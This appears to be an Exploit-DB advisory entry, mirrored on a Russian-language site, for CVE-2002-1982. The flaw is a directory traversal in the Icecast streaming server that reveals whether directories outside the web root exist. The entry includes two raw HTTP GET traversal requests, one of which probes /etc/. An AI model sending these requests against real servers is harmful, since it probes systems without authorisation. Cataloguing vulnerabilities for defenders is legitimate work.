- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21602
- Проверка EDB
-
- Пройдено
- Автор
- GLAIVE
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2002-1982
- Дата публикации
- 2002-07-09
Код:
source: https://www.securityfocus.com/bid/5189/info
Icecast is a freely available, open source streaming audio server. Icecast is available for the Unix, Linux, and Microsoft Windows platforms.
An attacker may exploit a directory traversal vulnerability in Icecast server to determine the existance of a specified directory outside of the web root. This is a result of the server returning different HTTP results for each case.
GET /file/../../../../../../../../nonexistent/ HTTP/1.0
GET /file/../../../../../../../../etc/ HTTP/1.0- Источник
- www.exploit-db.com
